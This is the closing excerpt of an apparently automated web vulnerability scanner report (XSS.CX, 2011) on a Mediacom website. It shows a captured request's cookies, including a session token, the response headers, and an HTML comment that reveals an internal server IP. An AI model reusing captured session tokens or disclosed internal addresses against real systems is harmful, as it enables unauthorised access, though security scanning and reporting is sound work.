Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313350190874; dslv=1313350190875; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 19:58:35 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135560
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- VHOST: mediacomtoday.com on 10.10.8.212 -->
...[SNIP]...

Report generated by XSS.CX at Mon Aug 15 09:46:48 GMT-06:00 2011.